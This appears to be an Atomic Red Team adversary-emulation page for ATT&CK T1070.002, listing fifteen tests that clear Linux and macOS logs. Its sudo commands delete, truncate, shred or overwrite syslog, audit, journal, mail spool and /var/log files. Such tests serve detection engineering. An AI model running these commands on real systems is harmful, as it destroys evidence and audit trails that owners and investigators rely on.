T1070.002
Indicator Removal on Host: Clear Linux or Mac System Logs
Description from ATT&CK
Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the /var/log/ directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)
- /var/log/messages:: General and system-related messages
- /var/log/secure or /var/log/auth.log: Authentication logs
- /var/log/utmp or /var/log/wtmp: Login records
- /var/log/kern.log: Kernel logs
- /var/log/cron.log: Crond logs
- /var/log/maillog: Mail server logs
- /var/log/httpd/: Web server access and error logs
Atomic Tests
Atomic Test #1 - rm -rf
Delete system and audit logs
Supported Platforms: macos,linux
auto_generated_guid: 989cc1b1-3642-4260-a809-54f9dd559683
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| syslog_path | path of syslog file to delete. On macos it's /var/log/system.log, on linux, it's /var/log/syslog. Also note for File events, that on macos, /var/ is a link to /private/var/. | string | /var/log/system.log |
| macos_audit_path | path of audit file to delete | string | /var/audit/20220725213300.202208110700021 |
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
1
2
3
sudo rm -rf #{syslog_path}
if [ -d /var/audit ] ; then sudo rm -rf #{macos_audit_path} ; fi
Dependencies: Run with sh!
Description: target files must exist
Check Prereq Commands:
1
2
if [ -d /var/audit ] ; then stat #{macos_audit_path} ; fi && stat #{syslog_path}
Get Prereq Commands:
1
2
3
touch #{syslog_path}
if [ -d /var/audit ] ; then touch #{macos_audit_path} ; fi
Atomic Test #2 - Delete log files using built-in log utility
This test deletes main log datastore, inflight log data, time-to-live data(TTL), fault and error content
Supported Platforms: macos
auto_generated_guid: 653d39cd-bae7-499a-898c-9fb96b8b5cd1
Inputs:
None
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
1
2
3
sudo log erase --all
sudo log erase --ttl #Deletes only time-to-live log content
Atomic Test #3 - Truncate system log files via truncate utility
This test truncates the system log files using the truncate utility with (-s 0 or –size=0) parameter which sets file size to zero, thus emptying the file content
Supported Platforms: macos
auto_generated_guid: 6290f8a8-8ee9-4661-b9cf-390031bf6973
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| system_log_path | path of system log to delete. | string | /var/log/system.log |
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
1
2
3
sudo truncate -s 0 #{system_log_path} #size parameter shorthand
sudo truncate --size=0 #{system_log_path} #size parameter
Dependencies: Run with sh!
Description: target files must exist
Check Prereq Commands:
1
2
stat #{system_log_path}
Get Prereq Commands:
1
2
touch #{system_log_path}
Atomic Test #4 - Delete log files via cat utility by appending /dev/null or /dev/zero
The first sub-test truncates the log file to zero bytes via /dev/null and the second sub-test fills the log file with null bytes(zeroes) via /dev/zero, using cat utility
Supported Platforms: macos
auto_generated_guid: c23bdb88-928d-493e-b46d-df2906a50941
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| system_log_path | path of system log to delete. | string | /var/log/system.log |
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
1
2
3
sudo cat /dev/null > #{system_log_path} #truncating the file to zero bytes
sudo dd if=/dev/zero bs=1000 count=5 of=#{system_log_path} #log file filled with null bytes(zeros)
Dependencies: Run with sh!
Description: target files must exist
Check Prereq Commands:
1
2
stat #{system_log_path}
Get Prereq Commands:
1
2
touch #{system_log_path}
Atomic Test #5 - System log file deletion via find utility
This test finds and deletes the system log files within /var/log/ directory using various executions(rm, shred, unlink)
Supported Platforms: macos
auto_generated_guid: bc8eeb4a-cc3e-45ec-aa6e-41e973da2558
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| system_log_name1 | name or prefix of system log to delete. | string | system.log |
| system_log_name2 | name or prefix of system log to delete. | string | system.log.97.gz |
| system_log_name3 | name or prefix of system log to delete. | string | system.log.98.gz |
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
1
2
3
4
sudo find /var/log -name '#{system_log_name1}.*' -exec rm {} \; #using "rm" execution
sudo find /var/log/ -name "#{system_log_name2}.*" -exec shred -u -z -n 3 {} \; #using "shred" execution
sudo find /var/log/ -name "#{system_log_name3}.*" -exec unlink {} \; #using "unlink" execution
Dependencies: Run with sh!
Description: target files must exist
Check Prereq Commands:
1
2
stat /var/log/#{system_log_name1} /var/log/#{system_log_name2} /var/log/#{system_log_name3}
Get Prereq Commands:
1
2
touch /var/log/#{system_log_name1} /var/log/#{system_log_name2} /var/log/#{system_log_name3}
Atomic Test #6 - Overwrite macOS system log via echo utility
This test overwrites the contents of system log file with an empty string using echo utility
Supported Platforms: macos
auto_generated_guid: 0208ea60-98f1-4e8c-8052-930dce8f742c
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| system_log_path | path to system.log | string | /var/log/system.log |
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
1
2
sudo echo '' > #{system_log_path}
Atomic Test #7 - Real-time system log clearance/deletion
This test reads real-time system log file and writes empty string to it, thus clearing the log file without tampering with the logging process
Supported Platforms: macos
auto_generated_guid: 848e43b3-4c0a-4e4c-b4c9-d1e8cea9651c
Inputs:
None
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
1
2
sudo log -f /var/log/system.log | : > /var/log/system.log
Atomic Test #8 - Delete system log files via unlink utility
This test deletes the system log file using unlink utility
Supported Platforms: macos
auto_generated_guid: 03013b4b-01db-437d-909b-1fdaa5010ee8
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| system_log_path | path to system.log | string | /var/log/system.log |
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
1
2
sudo unlink #{system_log_path}
Dependencies: Run with sh!
Description: target files must exist
Check Prereq Commands:
1
2
stat #{system_log_path}
Get Prereq Commands:
1
2
touch #{system_log_path}
Atomic Test #9 - Delete system log files using shred utility
This test overwrites the contents of the log file with zero bytes(-z) using three passes(-n 3) of data, and then delete the file(-u) securely
Supported Platforms: macos
auto_generated_guid: 86f0e4d5-3ca7-45fb-829d-4eda32b232bb
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| system_log_path | path to system.log | string | /var/log/system.log |
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
1
2
sudo shred -u -z -n 3 #{system_log_path}
Dependencies: Run with sh!
Description: target files must exist
Check Prereq Commands:
1
2
stat #{system_log_path}
Get Prereq Commands:
1
2
touch #{system_log_path}
Atomic Test #10 - Delete system log files using srm utility
This test securely deletes the system log files individually and recursively using the srm utility. Install srm using Homebrew with the command: brew install khell/homebrew-srm/srm Refer: https://github.com/khell/homebrew-srm/issues/1 for installation
Supported Platforms: macos
auto_generated_guid: b0768a5e-0f32-4e75-ae5b-d036edcf96b6
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| system_log_path | path to system.log | string | /var/log/system.log |
| system_log_folder | path to log parent folder | string | /var/log/ |
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
1
2
3
sudo srm #{system_log_path} #system log file deletion
sudo srm -r #{system_log_folder} #recursive deletion of log files
Dependencies: Run with sh!
Description: target files must exist
Check Prereq Commands:
1
2
stat #{system_log_path} #{system_log_folder}
Get Prereq Commands:
1
2
mkdir -p #{system_log_folder} && touch #{system_log_path} #{system_log_folder}/system.log
Atomic Test #11 - Delete system log files using OSAScript
This test deletes the system log file using osascript via "do shell script"(sh/bash by default) which in-turn spawns rm utility, requires admin privileges
Supported Platforms: macos
auto_generated_guid: 810a465f-cd4f-47bc-b43e-d2de3b033ecc
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| system_log_path | path to system.log | string | /var/log/system.log |
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
1
2
osascript -e 'do shell script "rm #{system_log_path}" with administrator privileges'
Dependencies: Run with sh!
Description: target files must exist
Check Prereq Commands:
1
2
stat #{system_log_path}
Get Prereq Commands:
1
2
touch #{system_log_path}
Atomic Test #12 - Delete system log files using Applescript
This test deletes the system log file using applescript using osascript via Finder application Note: The user may be prompted to grant access to the Finder application before the command can be executed successfully as part of TCC(Transparency, Consent, and Control) Framework. Refer: https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive
Supported Platforms: macos
auto_generated_guid: e62f8694-cbc7-468f-862c-b10cd07e1757
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| system_log_path | path to system.log | string | /var/log/system.log |
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
1
2
osascript -e 'tell application "Finder" to delete POSIX file "#{system_log_path}"'
Dependencies: Run with sh!
Description: target files must exist
Check Prereq Commands:
1
2
stat #{system_log_path}
Get Prereq Commands:
1
2
touch #{system_log_path}
Atomic Test #13 - Delete system journal logs via rm and journalctl utilities
The first sub-test deletes the journal files using rm utility in the "/var/log/journal/" directory and the second sub-test clears the journal by modifiying time period of logs that should be retained to zero.
Supported Platforms: linux
auto_generated_guid: ca50dd85-81ff-48ca-92e1-61f119cb1dcf
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| journal_folder | path to journal logs | string | /var/log/journal |
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
1
2
3
sudo rm #{journal_folder}/* #physically deletes the journal files, and not just their content
sudo journalctl --vacuum-time=0 #clears the journal while still keeping the journal files in place
Dependencies: Run with sh!
Description: target files must exist
Check Prereq Commands:
1
2
stat #{journal_folder}
Get Prereq Commands:
1
2
mkdir -p #{journal_folder} && touch #{journal_folder}/T1070_002.journal
Atomic Test #14 - Overwrite Linux Mail Spool
This test overwrites the Linux mail spool of a specified user. This technique was used by threat actor Rocke during the exploitation of Linux web servers.
Supported Platforms: linux
auto_generated_guid: 1602ff76-ed7f-4c94-b550-2f727b4782d4
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| username | Username of mail spool | string | root |
Attack Commands: Run with bash! Elevation Required (e.g. root or admin)
1
2
echo 0> /var/spool/mail/#{username}
Dependencies: Run with sh!
Description: target files must exist
Check Prereq Commands:
1
2
stat /var/spool/mail/#{username}
Get Prereq Commands:
1
2
touch /var/spool/mail/#{username}
Atomic Test #15 - Overwrite Linux Log
This test overwrites the specified log. This technique was used by threat actor Rocke during the exploitation of Linux web servers.
Supported Platforms: linux
auto_generated_guid: d304b2dc-90b4-4465-a650-16ddd503f7b5
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| log_path | Path of specified log | path | /var/log/secure |
Attack Commands: Run with bash! Elevation Required (e.g. root or admin)
1
2
echo 0> #{log_path}
Cleanup Commands:
1
2
if [ "/var/log/secure" != "#{log_path}" ] ; then rm -f #{log_path} ; fi